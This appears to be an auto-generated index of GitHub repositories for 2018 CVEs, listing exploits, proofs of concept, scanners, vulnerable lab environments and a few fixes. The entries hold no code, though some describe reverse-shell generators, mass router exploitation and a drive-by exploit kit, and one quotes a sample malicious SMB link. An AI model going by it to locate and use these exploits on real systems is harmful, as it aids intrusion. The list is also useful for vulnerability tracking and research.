**None** : [jiansiting/weblogic-cve-2018-2628](https://api.github.com/repos/jiansiting/weblogic-cve-2018-2628) create time: 2018-04-18T16:04:17Z

**CVE-2018-2628** : [hawk-520/CVE-2018-2628](https://api.github.com/repos/hawk-520/CVE-2018-2628) create time: 2018-04-19T03:19:15Z

**CVE-2018-7600 - Drupal 7.x RCE** : [FireFart/CVE-2018-7600](https://api.github.com/repos/FireFart/CVE-2018-7600) create time: 2018-04-16T20:16:21Z

**Exploit for CVE-2018-7600.. called drupalgeddon2, ** : [lorddemon/drupalgeddon2](https://api.github.com/repos/lorddemon/drupalgeddon2) create time: 2018-04-19T03:31:47Z

**WebLogic WLS核心组件反序列化漏洞多线程批量检测脚本 CVE-2018-2628-MultiThreading** : [aedoo/CVE-2018-2628-MultiThreading](https://api.github.com/repos/aedoo/CVE-2018-2628-MultiThreading) create time: 2018-04-18T17:50:29Z

**macOS 10.13.3 (17D47) Safari Wasm Exploit ** : [FSecureLABS/CVE-2018-4121](https://api.github.com/repos/FSecureLABS/CVE-2018-4121) create time: 2018-04-19T08:33:12Z

**None** : [9uest/CVE-2018-2628](https://api.github.com/repos/9uest/CVE-2018-2628) create time: 2018-04-19T15:56:49Z

**None** : [Shadowshusky/CVE-2018-2628all](https://api.github.com/repos/Shadowshusky/CVE-2018-2628all) create time: 2018-04-20T01:24:17Z

**None** : [shaoshore/CVE-2018-2628](https://api.github.com/repos/shaoshore/CVE-2018-2628) create time: 2018-04-20T02:14:21Z

**None** : [zjxzjx/CVE-2018-2628-detect](https://api.github.com/repos/zjxzjx/CVE-2018-2628-detect) create time: 2018-04-18T17:28:44Z

**None** : [ymgh96/Detecting-the-patch-of-CVE-2018-1010](https://api.github.com/repos/ymgh96/Detecting-the-patch-of-CVE-2018-1010) create time: 2018-04-20T09:50:40Z

**None** : [mudhappy/Wordpress-Hack-CVE-2018-6389](https://api.github.com/repos/mudhappy/Wordpress-Hack-CVE-2018-6389) create time: 2018-04-20T17:45:38Z

**CalderaForms 1.5.9.1 XSS (WordPress plugin) - tutorial** : [mindpr00f/CVE-2018-7747](https://api.github.com/repos/mindpr00f/CVE-2018-7747) create time: 2018-04-20T15:49:23Z

**CVE-2018-6574 POC : golang 'go get' remote command execution during source code build** : [neargle/CVE-2018-6574-POC](https://api.github.com/repos/neargle/CVE-2018-6574-POC) create time: 2018-04-24T03:44:20Z

**Composr CMS 10.0.13 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2018-6518** : [faizzaidi/Composr-CMS-10.0.13-Cross-Site-Scripting-XSS](https://api.github.com/repos/faizzaidi/Composr-CMS-10.0.13-Cross-Site-Scripting-XSS) create time: 2018-04-25T16:35:41Z

**CVE-2018-9160** : [mechanico/sickrageWTF](https://api.github.com/repos/mechanico/sickrageWTF) create time: 2018-04-26T05:49:09Z

**POC to test/exploit drupal vulnerability SA-CORE-2018-004 / CVE-2018-7602** : [1337g/Drupalgedon3](https://api.github.com/repos/1337g/Drupalgedon3) create time: 2018-04-27T01:59:31Z

**Exploit for Drupal 7 <= 7.57 CVE-2018-7600** : [pimps/CVE-2018-7600](https://api.github.com/repos/pimps/CVE-2018-7600) create time: 2018-04-17T15:38:15Z

**None** : [ymgh96/Detecting-the-CVE-2018-1026-and-its-patch](https://api.github.com/repos/ymgh96/Detecting-the-CVE-2018-1026-and-its-patch) create time: 2018-04-28T11:28:11Z

**PoC exploit for CVE-2018-5234** : [embedi/ble_norton_core](https://api.github.com/repos/embedi/ble_norton_core) create time: 2018-05-01T16:40:30Z

**An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by "xlink:href=file://192.168.0.2/test.jpg" within an "office:document-content" element in a ".odt XML document".** : [TaharAmine/CVE-2018-10583](https://api.github.com/repos/TaharAmine/CVE-2018-10583) create time: 2018-05-03T00:34:08Z

**Vuln checker for Drupal v7.x + v8.x (CVE-2018-7600 / SA-CORE-2018-002)** : [Damian972/drupalgeddon-2](https://api.github.com/repos/Damian972/drupalgeddon-2) create time: 2018-05-01T01:38:43Z

**None** : [dsfau/CVE-2018-10546](https://api.github.com/repos/dsfau/CVE-2018-10546) create time: 2018-05-03T09:35:27Z

**None** : [dsfau/CVE-2018-1000199](https://api.github.com/repos/dsfau/CVE-2018-1000199) create time: 2018-05-03T09:37:56Z

**CVE-2018-6789** : [c0llision/exim-vuln-poc](https://api.github.com/repos/c0llision/exim-vuln-poc) create time: 2018-03-16T16:21:22Z

**Proof-of-Concept for Drupal CVE-2018-7600 / SA-CORE-2018-002** : [thehappydinoa/CVE-2018-7600](https://api.github.com/repos/thehappydinoa/CVE-2018-7600) create time: 2018-04-15T02:21:59Z

**CVE-2018-10467** : [alt3kx/CVE-2018-10467](https://api.github.com/repos/alt3kx/CVE-2018-10467) create time: 2018-04-27T03:35:47Z

**CVE-2018-10715** : [alt3kx/CVE-2018-10715](https://api.github.com/repos/alt3kx/CVE-2018-10715) create time: 2018-05-04T01:33:22Z

**WP-DOS-Exploit-CVE-2018-6389** : [armaanpathan12345/WP-DOS-Exploit-CVE-2018-6389](https://api.github.com/repos/armaanpathan12345/WP-DOS-Exploit-CVE-2018-6389) create time: 2018-05-04T05:15:33Z

**Authentication Bypass / Command Injection Exploit CVE-2018-1056** : [rotemkama/Gpon-Routers](https://api.github.com/repos/rotemkama/Gpon-Routers) create time: 2018-05-07T08:52:45Z

**exploit of smt proxyoverflow bug, i.e. CVE-2018–10376** : [zhanlulab/Exploit_SMT_ProxyOverflow](https://api.github.com/repos/zhanlulab/Exploit_SMT_ProxyOverflow) create time: 2018-05-03T13:49:03Z

**Fixed exploit for Nagios CVE-2018-8733, CVE-2018-8734, CVE-2018-8735, CVE-2018-8736 https://www.exploit-db.com/exploits/44560/** : [xfer0/Nagios-XI-5.2.6-9-5.3-5.4-Chained-Remote-Root-Exploit-Fixed](https://api.github.com/repos/xfer0/Nagios-XI-5.2.6-9-5.3-5.4-Chained-Remote-Root-Exploit-Fixed) create time: 2018-05-07T19:55:36Z

**A sandbox escape based on the proof-of-concept (CVE-2018-4087) by Rani Idan (Zimperium)** : [MTJailed/UnjailMe](https://api.github.com/repos/MTJailed/UnjailMe) create time: 2018-02-28T14:45:06Z

**Proof of concept for CVE-2018-4150 by @cmwdotme ** : [Jailbreaks/CVE-2018-4150](https://api.github.com/repos/Jailbreaks/CVE-2018-4150) create time: 2018-05-08T16:12:59Z

**Tool to dive Apache logs for evidence of exploitation of CVE-2018-7600** : [Hestat/drupal-check](https://api.github.com/repos/Hestat/drupal-check) create time: 2018-04-24T14:34:46Z

**DVR系列摄像头批量检测** : [Huangkey/CVE-2018-9995_check](https://api.github.com/repos/Huangkey/CVE-2018-9995_check) create time: 2018-05-09T00:43:24Z

**Simple IOCTL dispatcher for CVE-2018-8060/8061** : [otavioarj/SIOCtl](https://api.github.com/repos/otavioarj/SIOCtl) create time: 2018-04-27T19:45:20Z

**None** : [hellowenying/CVE2018-0171](https://api.github.com/repos/hellowenying/CVE2018-0171) create time: 2018-05-08T14:42:24Z

**Exploit for Remote Code Execution on GPON home routers (CVE-2018-10562) written in Python. Initially disclosed by VPNMentor (https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/), kudos for their work.** : [f3d0x0/GPON](https://api.github.com/repos/f3d0x0/GPON) create time: 2018-05-07T10:34:10Z

**Implements the POP/MOV SS (CVE-2018-8897) vulnerability by bugchecking the machine (local DoS). ** : [nmulasmajic/CVE-2018-8897](https://api.github.com/repos/nmulasmajic/CVE-2018-8897) create time: 2018-05-10T20:46:30Z

**a iOS CVE-2018-4150 Application example.** : [RPwnage/LovelySn0w](https://api.github.com/repos/RPwnage/LovelySn0w) create time: 2018-05-10T15:04:44Z

**The exploitation for CVE-2018-8897** : [jiazhang0/pop-mov-ss-exploit](https://api.github.com/repos/jiazhang0/pop-mov-ss-exploit) create time: 2018-05-13T09:05:07Z

**CVE-2018-6574 for pentesterLAB** : [willbo4r/go-get-rce](https://api.github.com/repos/willbo4r/go-get-rce) create time: 2018-05-17T08:32:40Z

**Environment for DynoRoot (CVE-2018-1111)** : [knqyf263/CVE-2018-1111](https://api.github.com/repos/knqyf263/CVE-2018-1111) create time: 2018-05-17T09:37:19Z

**Exploit loader for Remote Code Execution w/ Payload on GPON Home Gateway devices (CVE-2018-10562) written in Python.** : [Choudai/GPON-LOADER](https://api.github.com/repos/Choudai/GPON-LOADER) create time: 2018-05-17T22:03:47Z

**None** : [bigric3/cve-2018-8120](https://api.github.com/repos/bigric3/cve-2018-8120) create time: 2018-05-17T08:51:39Z

**Arbitrary code execution with kernel privileges using CVE-2018-8897.** : [can1357/CVE-2018-8897](https://api.github.com/repos/can1357/CVE-2018-8897) create time: 2018-05-13T19:34:17Z

**cve-2018-6574 @pentesterlab** : [ahmetmanga/go-get-rce](https://api.github.com/repos/ahmetmanga/go-get-rce) create time: 2018-05-20T09:39:15Z

**None** : [ahmetmanga/cve-2018-6574](https://api.github.com/repos/ahmetmanga/cve-2018-6574) create time: 2018-05-20T20:32:15Z

**None** : [gwolfs/CVE-2018-9995-ModifiedByGwolfs](https://api.github.com/repos/gwolfs/CVE-2018-9995-ModifiedByGwolfs) create time: 2018-05-11T07:05:37Z

**My version - Easy File Sharing Web Server 7.2 - 'UserID' - Win 7 'DEP' bypass ** : [manojcode/easy-file-share-7.2-exploit-CVE-2018-9059](https://api.github.com/repos/manojcode/easy-file-share-7.2-exploit-CVE-2018-9059) create time: 2018-05-20T05:13:25Z

**None** : [s0wr0b1ndef/CVE-2018-2628](https://api.github.com/repos/s0wr0b1ndef/CVE-2018-2628) create time: 2018-05-21T09:04:45Z

**Some codes for bypassing Oracle WebLogic CVE-2018-2628 patch** : [tdy218/ysoserial-cve-2018-2628](https://api.github.com/repos/tdy218/ysoserial-cve-2018-2628) create time: 2018-05-03T03:13:05Z

**CVE-2018-1111 DynoRoot** : [kkirsche/CVE-2018-1111](https://api.github.com/repos/kkirsche/CVE-2018-1111) create time: 2018-05-18T13:27:43Z

**Collection of "modchip" designs for launching payloads via the Tegra RCM bug (CVE-2018-6242) ** : [reswitched/rcm-modchips](https://api.github.com/repos/reswitched/rcm-modchips) create time: 2018-05-22T01:15:14Z

**CVE-2018-8174 - VBScript memory corruption exploit.** : [0x09AL/CVE-2018-8174-msf](https://api.github.com/repos/0x09AL/CVE-2018-8174-msf) create time: 2018-05-22T21:50:32Z

**None** : [Jyozi/CVE-2018-7600](https://api.github.com/repos/Jyozi/CVE-2018-7600) create time: 2018-05-25T06:19:05Z

**Exploit for Mass Remote Code Execution on GPON home routers (CVE-2018-10562) obtained from Shodan.** : [649/Pingpon-Exploit](https://api.github.com/repos/649/Pingpon-Exploit) create time: 2018-05-15T17:31:21Z

**Exploit for Remote Code Execution on GPON home routers (CVE-2018-10562) written in Python.** : [c0ld1/GPON_RCE](https://api.github.com/repos/c0ld1/GPON_RCE) create time: 2018-05-26T08:05:22Z

**CVE-2018-11517 | mySCADA myPRO v7.0.46 has another vulnerability to discover all projects in the system.** : [EmreOvunc/mySCADA-myPRO-7-projectID-Disclosure](https://api.github.com/repos/EmreOvunc/mySCADA-myPRO-7-projectID-Disclosure) create time: 2018-05-26T15:49:07Z

**CVE-2018-8174_python** : [Yt1g3r/CVE-2018-8174_EXP](https://api.github.com/repos/Yt1g3r/CVE-2018-8174_EXP) create time: 2018-05-30T03:12:32Z

**CVE-2018-8120 Windows LPE exploit** : [unamer/CVE-2018-8120](https://api.github.com/repos/unamer/CVE-2018-8120) create time: 2018-05-19T02:43:15Z

**incomplete exploit for CVE-2018-4150 (by cmwdotme) for devices without SMAP** : [littlelailo/incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-](https://api.github.com/repos/littlelailo/incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-) create time: 2018-05-30T14:29:37Z

**Proof of Concept** : [evilmiracle/CVE-2018-11236](https://api.github.com/repos/evilmiracle/CVE-2018-11236) create time: 2018-06-01T03:05:42Z

**RCE vulnerability to exec "git clone --recurse-submodule" (CVE-2018-11235)** : [vmotos/CVE-2018-11235](https://api.github.com/repos/vmotos/CVE-2018-11235) create time: 2018-05-31T08:38:17Z

**My version - [Win10 x64] CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass CVE-2018-6892** : [manojcode/-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass](https://api.github.com/repos/manojcode/-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass) create time: 2018-05-31T09:44:07Z

**None** : [Choihosu/cve-2018-11235](https://api.github.com/repos/Choihosu/cve-2018-11235) create time: 2018-05-31T13:29:06Z

**Tools to exercise the Linux kernel mitigation for CVE-2018-3639 (aka Variant 4) using the Speculative Store Bypass Disable (SSBD) feature of x86 processors** : [tyhicks/ssbd-tools](https://api.github.com/repos/tyhicks/ssbd-tools) create time: 2018-05-31T19:48:18Z

**MS Word MS WordPad via IE VBS Engine RCE ** : [SyFi/CVE-2018-8174](https://api.github.com/repos/SyFi/CVE-2018-8174) create time: 2018-06-01T22:12:54Z

**Dataiku REST-API by default the software, allows anonymous access to functionality that allows an attacker to know valid users.** : [alt3kx/CVE-2018-10732](https://api.github.com/repos/alt3kx/CVE-2018-10732) create time: 2018-05-07T09:07:58Z

**TwonkyMedia Server 7.0.11-8.5 Directory Traversal CVE-2018-7171** : [mechanico/sharingIsCaring](https://api.github.com/repos/mechanico/sharingIsCaring) create time: 2018-01-09T17:01:45Z

**My version - CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass on Win7 x64 CVE-2018-6892** : [manojcode/CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass](https://api.github.com/repos/manojcode/CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass) create time: 2018-05-31T03:25:02Z

**cve-2018-2628 反弹shell** : [wrysunny/cve-2018-2628](https://api.github.com/repos/wrysunny/cve-2018-2628) create time: 2018-06-05T01:47:02Z

**None** : [ne1llee/cve-2018-8120](https://api.github.com/repos/ne1llee/cve-2018-8120) create time: 2018-06-05T03:12:52Z

**POC for CVE-2018-1273** : [wearearima/poc-cve-2018-1273](https://api.github.com/repos/wearearima/poc-cve-2018-1273) create time: 2018-04-17T13:41:00Z

**Buffer Overflow Vulnerability that can result ACE** : [u0pattern/CVE-2018-1000117-Exploit](https://api.github.com/repos/u0pattern/CVE-2018-1000117-Exploit) create time: 2018-06-05T20:28:29Z

**for git v2.7.4** : [Kiss-sh0t/CVE-2018-11235-poc](https://api.github.com/repos/Kiss-sh0t/CVE-2018-11235-poc) create time: 2018-06-06T08:48:57Z

**Exploits CVE-2018-11235** : [H0K5/clone_and_pwn](https://api.github.com/repos/H0K5/clone_and_pwn) create time: 2018-06-11T12:41:34Z

**CVE-2018-4241: XNU kernel heap overflow due to bad bounds checking in MPTCP for iOS 11 - 11.3.1released by Ian Beer** : [0neday/multi_path](https://api.github.com/repos/0neday/multi_path) create time: 2018-06-06T00:07:01Z

**Exploit for CVE-2018-10562** : [ATpiu/CVE-2018-10562](https://api.github.com/repos/ATpiu/CVE-2018-10562) create time: 2018-06-06T09:43:40Z

**None** : [CHYbeta/CVE-2018-11235-DEMO](https://api.github.com/repos/CHYbeta/CVE-2018-11235-DEMO) create time: 2018-06-01T01:26:19Z

**Rig Exploit for CVE-2018-8174 As with its previous campaigns, Rig’s Seamless campaign uses malvertising. In this case, the malvertisements have a hidden iframe that redirects victims to Rig’s landing page, which includes an exploit for CVE-2018-8174 and shellcode. This enables remote code execution of the shellcode obfuscated in the landing page. After successful exploitation, a second-stage downloader is retrieved, which appears to be a variant of SmokeLoader due to the URL. It would then download the final payload, a Monero miner.** : [orf53975/Rig-Exploit-for-CVE-2018-8174](https://api.github.com/repos/orf53975/Rig-Exploit-for-CVE-2018-8174) create time: 2018-06-26T09:03:45Z

** CVE-2018-4878 flash 0day** : [ydl555/CVE-2018-4878](https://api.github.com/repos/ydl555/CVE-2018-4878) create time: 2018-06-12T02:57:59Z

**备忘:flash挂马工具备份 CVE-2018-4878** : [ydl555/CVE-2018-4878-](https://api.github.com/repos/ydl555/CVE-2018-4878-) create time: 2018-01-20T12:32:26Z

**None** : [SAPCNA/CVELIST_New2018](https://api.github.com/repos/SAPCNA/CVELIST_New2018) create time: 2018-06-12T13:42:50Z

**BlackCat-CMS-Bundle-v1.3 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2018-10821** : [BalvinderSingh23/Cross-Site-Scripting-Reflected-XSS-Vulnerability-in-blackcatcms_v1.3](https://api.github.com/repos/BalvinderSingh23/Cross-Site-Scripting-Reflected-XSS-Vulnerability-in-blackcatcms_v1.3) create time: 2018-06-13T14:52:34Z

**empty_list - exploit for p0 issue 1564 (CVE-2018-4243) iOS 11.0 - 11.3.1 kernel r/w** : [Jailbreaks/empty_list](https://api.github.com/repos/Jailbreaks/empty_list) create time: 2018-06-13T15:38:18Z

**CVE-2018-8120 POC** : [areuu/CVE-2018-8120](https://api.github.com/repos/areuu/CVE-2018-8120) create time: 2018-06-16T09:40:27Z

**None** : [malindarathnayake/Intel-CVE-2018-3639-Mitigation_RegistryUpdate](https://api.github.com/repos/malindarathnayake/Intel-CVE-2018-3639-Mitigation_RegistryUpdate) create time: 2018-06-19T02:19:26Z

**Just a couple exploits for CVE-2018-11510** : [mefulton/CVE-2018-11510](https://api.github.com/repos/mefulton/CVE-2018-11510) create time: 2018-06-18T23:49:41Z

**CVE-2018-12597** : [alt3kx/CVE-2018-12597](https://api.github.com/repos/alt3kx/CVE-2018-12597) create time: 2018-06-21T06:55:39Z

**CVE-2018-12598** : [alt3kx/CVE-2018-12598](https://api.github.com/repos/alt3kx/CVE-2018-12598) create time: 2018-06-21T06:59:46Z

**None** : [kaisaryousuf/CVE-2018-8208](https://api.github.com/repos/kaisaryousuf/CVE-2018-8208) create time: 2018-08-13T06:56:11Z

**None** : [guwudoor/CVE-2018-8214](https://api.github.com/repos/guwudoor/CVE-2018-8214) create time: 2018-06-25T13:43:58Z

**POC for CVE-2018-0824** : [codewhitesec/UnmarshalPwn](https://api.github.com/repos/codewhitesec/UnmarshalPwn) create time: 2018-06-15T08:59:37Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.1049. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Text Annotations. When setting the point attribute, the process does not properly validate the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process.** : [t3rabyt3-zz/CVE-2018-9958--Exploit](https://api.github.com/repos/t3rabyt3-zz/CVE-2018-9958--Exploit) create time: 2018-06-25T19:34:36Z

**None** : [stevenlinfeng/CVE-2018-2628](https://api.github.com/repos/stevenlinfeng/CVE-2018-2628) create time: 2018-06-26T08:25:57Z

**Cisco ASA - CVE-2018-0296 | Exploit** : [bhenner1/CVE-2018-0296](https://api.github.com/repos/bhenner1/CVE-2018-0296) create time: 2018-06-22T21:12:58Z

**CVE-ID: CVE-2018-11450** : [LucvanDonk/Siemens-Siemens-PLM-Software-TEAMCENTER-Reflected-Cross-Site-Scripting-XSS-vulnerability](https://api.github.com/repos/LucvanDonk/Siemens-Siemens-PLM-Software-TEAMCENTER-Reflected-Cross-Site-Scripting-XSS-vulnerability) create time: 2018-06-27T21:16:57Z

**None** : [martinfrancois/CVE-2018-1000529](https://api.github.com/repos/martinfrancois/CVE-2018-1000529) create time: 2018-05-21T23:43:18Z

**exploit camera with vuln cve-2018-9995 ( Novo, CeNova, QSee, Pulnix, XVR 5 in 1 (title: "XVR Login"), Securus, - Security. Never Compromise !! - Night OWL, DVR Login, HVR Login, MDVR Login )** : [shacojx/cve-2018-9995](https://api.github.com/repos/shacojx/cve-2018-9995) create time: 2018-06-30T10:54:40Z

**None** : [likescam/CVE-2018-2628](https://api.github.com/repos/likescam/CVE-2018-2628) create time: 2018-07-02T09:00:34Z

**CVE-2018-11311 | mySCADA myPRO 7 Hardcoded FTP Username and Password Vulnerability** : [EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password](https://api.github.com/repos/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password) create time: 2018-05-19T17:14:49Z

**A fix for the batchOverflow bug https://medium.com/@peckshield/alert-new-batchoverflow-bug-in-multiple-erc20-smart-contracts-cve-2018-10299-511067db6536** : [phzietsman/batchOverflow](https://api.github.com/repos/phzietsman/batchOverflow) create time: 2018-05-11T12:23:08Z

**Hotfix for file deletion to to code execution vulnerability in WordPress** : [bloom-ux/cve-2018-12895-hotfix](https://api.github.com/repos/bloom-ux/cve-2018-12895-hotfix) create time: 2018-07-05T19:09:17Z

**CVE-2018-4248: Out-of-bounds read in libxpc during string serialization.** : [bazad/xpc-string-leak](https://api.github.com/repos/bazad/xpc-string-leak) create time: 2018-05-10T04:31:38Z

**Analysis of VBS exploit CVE-2018-8174** : [piotrflorczyk/cve-2018-8174_analysis](https://api.github.com/repos/piotrflorczyk/cve-2018-8174_analysis) create time: 2018-07-10T19:31:25Z

**None** : [happynote3966/CVE-2018-7602](https://api.github.com/repos/happynote3966/CVE-2018-7602) create time: 2018-07-12T05:08:14Z

**None** : [happynote3966/CVE-2018-7600](https://api.github.com/repos/happynote3966/CVE-2018-7600) create time: 2018-07-12T01:12:44Z

**XML external entity (XXE) vulnerability in /ssc/fm-ws/services in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10 (0day CVE-2018-12463)** : [alt3kx/CVE-2018-12463](https://api.github.com/repos/alt3kx/CVE-2018-12463) create time: 2018-07-10T09:51:40Z

**Collection of exploits/POC for PrestaShop cookie vulnerabilities (CVE-2018-13784)** : [ambionics/prestashop-exploits](https://api.github.com/repos/ambionics/prestashop-exploits) create time: 2018-07-16T16:33:41Z

**None** : [likescam/CVE-2018-4121](https://api.github.com/repos/likescam/CVE-2018-4121) create time: 2018-07-17T16:15:29Z

**CVE-2018-2893** : [sry309/CVE-2018-2893](https://api.github.com/repos/sry309/CVE-2018-2893) create time: 2018-07-19T06:06:10Z

**CVE-2018-2893 PoC** : [ryanInf/CVE-2018-2893](https://api.github.com/repos/ryanInf/CVE-2018-2893) create time: 2018-07-19T06:28:12Z

**CVE-2018-2628 & CVE-2018-2893** : [shengqi158/CVE-2018-2628](https://api.github.com/repos/shengqi158/CVE-2018-2628) create time: 2018-04-18T05:41:23Z

**CVE-2018-2894 WebLogic Unrestricted File Upload Lead To RCE Check Script** : [LandGrey/CVE-2018-2894](https://api.github.com/repos/LandGrey/CVE-2018-2894) create time: 2018-07-20T03:59:18Z

**cve-2018-2894 不同别人的利用方法。** : [111ddea/cve-2018-2894](https://api.github.com/repos/111ddea/cve-2018-2894) create time: 2018-07-19T15:50:35Z

**反弹shell生成器** : [bigsizeme/CVE-2018-2893](https://api.github.com/repos/bigsizeme/CVE-2018-2893) create time: 2018-07-20T07:26:43Z

**None** : [pudding2/CVE-2018-14083](https://api.github.com/repos/pudding2/CVE-2018-14083) create time: 2018-07-24T02:36:08Z

**None** : [YanZiShuang/CVE-2018-6546](https://api.github.com/repos/YanZiShuang/CVE-2018-6546) create time: 2018-07-25T10:22:53Z

**可以直接反弹shell** : [qianl0ng/CVE-2018-2893](https://api.github.com/repos/qianl0ng/CVE-2018-2893) create time: 2018-07-26T07:16:38Z

**DLL Hijacking in Quickheal Total Security/ Internet Security/ Antivirus Pro (Installers)** : [kernelm0de/CVE-2018-8090](https://api.github.com/repos/kernelm0de/CVE-2018-8090) create time: 2018-07-23T07:17:07Z

**M1 Band Smart Watch Bluetooth Low Energy Exploit python script (CVE-2018-11631)** : [xMagass/bandexploit](https://api.github.com/repos/xMagass/bandexploit) create time: 2018-05-31T17:46:59Z

**None** : [MostafaSoliman/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit](https://api.github.com/repos/MostafaSoliman/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit) create time: 2018-07-26T19:31:45Z

**None** : [dj-thd/cve2018-11235-exploit](https://api.github.com/repos/dj-thd/cve2018-11235-exploit) create time: 2018-07-27T22:01:47Z

**Drupalgeddon2 POC + Scanner (adapted)** : [fyraiga/CVE-2018-7600-drupalgeddon2-scanner](https://api.github.com/repos/fyraiga/CVE-2018-7600-drupalgeddon2-scanner) create time: 2018-04-27T04:11:43Z

**CVE-2018-8120 Exploit for Win2003 Win2008 WinXP Win7 ** : [alpha1ab/CVE-2018-8120](https://api.github.com/repos/alpha1ab/CVE-2018-8120) create time: 2018-06-07T08:30:07Z

**Easy script to check if drupal 8.x-8.5.6 is vulnerable to CVE-2018-14.773** : [lckJack/legacySymfony](https://api.github.com/repos/lckJack/legacySymfony) create time: 2018-08-08T12:42:56Z

**Implements the POP/MOV SS (CVE-2018-8897) vulnerability by leveraging SYSCALL to perform a local privilege escalation (LPE).** : [nmulasmajic/syscall_exploit_CVE-2018-8897](https://api.github.com/repos/nmulasmajic/syscall_exploit_CVE-2018-8897) create time: 2018-08-08T20:04:56Z

**CVE-2018-9995_Batch_scanning_exp** : [zzh217/CVE-2018-9995_Batch_scanning_exp](https://api.github.com/repos/zzh217/CVE-2018-9995_Batch_scanning_exp) create time: 2018-05-08T12:07:26Z

**dd** : [EVOL4/CVE-2018-8120](https://api.github.com/repos/EVOL4/CVE-2018-8120) create time: 2018-07-11T02:41:16Z

**Environment for CVE-2018-1273 (Spring Data Commons)** : [knqyf263/CVE-2018-1273](https://api.github.com/repos/knqyf263/CVE-2018-1273) create time: 2018-04-13T13:41:02Z

**None** : [sischkg/cve-2018-5740](https://api.github.com/repos/sischkg/cve-2018-5740) create time: 2018-08-15T01:50:41Z

**CVE-2018-8120 Windows LPE exploit** : [ozkanbilge/CVE-2018-8120](https://api.github.com/repos/ozkanbilge/CVE-2018-8120) create time: 2018-08-16T10:51:00Z

**Exploit for CVE-2018-4233, a WebKit JIT optimization bug used during Pwn2Own 2018** : [saelo/cve-2018-4233](https://api.github.com/repos/saelo/cve-2018-4233) create time: 2018-08-08T14:41:20Z

**Microsoft Visual Studio CVE-2018-8172 Remote Code Execution Vulnerability** : [SyFi/CVE-2018-8172](https://api.github.com/repos/SyFi/CVE-2018-8172) create time: 2018-08-18T03:37:15Z

**PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service** : [atredispartners/CVE-2018-0952-SystemCollector](https://api.github.com/repos/atredispartners/CVE-2018-0952-SystemCollector) create time: 2018-08-21T20:29:10Z

**PoC code for CVE-2018-15499 (exploit race condition for BSoD)** : [DownWithUp/CVE-2018-15499](https://api.github.com/repos/DownWithUp/CVE-2018-15499) create time: 2018-08-21T15:26:35Z

**Docker image for a vulnerable struts app** : [trbpnd/CVE-2018-11776](https://api.github.com/repos/trbpnd/CVE-2018-11776) create time: 2018-08-23T19:25:26Z

**a exp for cve-2018-9948/9958 , current shellcode called win-calc ** : [orangepirate/cve-2018-9948-9958-exp](https://api.github.com/repos/orangepirate/cve-2018-9948-9958-exp) create time: 2018-08-21T07:43:38Z

**CVE-2018-11776(S2-057) EXPLOIT CODE** : [jiguangin/CVE-2018-11776](https://api.github.com/repos/jiguangin/CVE-2018-11776) create time: 2018-08-24T03:01:29Z

**Working Python test and PoC for CVE-2018-11776, includes Docker lab** : [hook-s3c/CVE-2018-11776-Python-PoC](https://api.github.com/repos/hook-s3c/CVE-2018-11776-Python-PoC) create time: 2018-08-24T11:53:02Z

**Vulnerable docker container for CVE-2018-11776** : [bhdresh/CVE-2018-11776](https://api.github.com/repos/bhdresh/CVE-2018-11776) create time: 2018-08-25T03:06:30Z

**Environment for CVE-2018-11776 / S2-057 (Apache Struts 2)** : [knqyf263/CVE-2018-11776](https://api.github.com/repos/knqyf263/CVE-2018-11776) create time: 2018-08-25T12:45:15Z

** An exploit for Apache Struts CVE-2018-11776** : [mazen160/struts-pwn_CVE-2018-11776](https://api.github.com/repos/mazen160/struts-pwn_CVE-2018-11776) create time: 2018-08-25T01:53:30Z

**None** : [GitHubAssessments/CVE_Assessment_01_2018](https://api.github.com/repos/GitHubAssessments/CVE_Assessment_01_2018) create time: 2018-08-02T03:28:21Z

**None** : [GitHubAssessments/CVE_Assessment_02_2018](https://api.github.com/repos/GitHubAssessments/CVE_Assessment_02_2018) create time: 2018-08-25T06:10:06Z

**None** : [renorobert/virtualbox-cve-2018-2844](https://api.github.com/repos/renorobert/virtualbox-cve-2018-2844) create time: 2018-08-28T08:04:19Z

**None** : [coderobe/CVE-2018-15912-PoC](https://api.github.com/repos/coderobe/CVE-2018-15912-PoC) create time: 2018-08-28T17:40:52Z

**CVE-2018-6643** : [undefinedmode/CVE-2018-6643](https://api.github.com/repos/undefinedmode/CVE-2018-6643) create time: 2018-08-26T16:03:08Z

**A simple exploit for Apache Struts RCE S2-057 (CVE-2018-11776)** : [brianwrf/S2-057-CVE-2018-11776](https://api.github.com/repos/brianwrf/S2-057-CVE-2018-11776) create time: 2018-08-28T23:48:14Z

**CVE-2018-12031 | LFI in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.** : [EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion](https://api.github.com/repos/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion) create time: 2018-06-06T15:31:29Z

**None** : [tuxotron/cve-2018-11776-docker](https://api.github.com/repos/tuxotron/cve-2018-11776-docker) create time: 2018-08-28T01:14:52Z

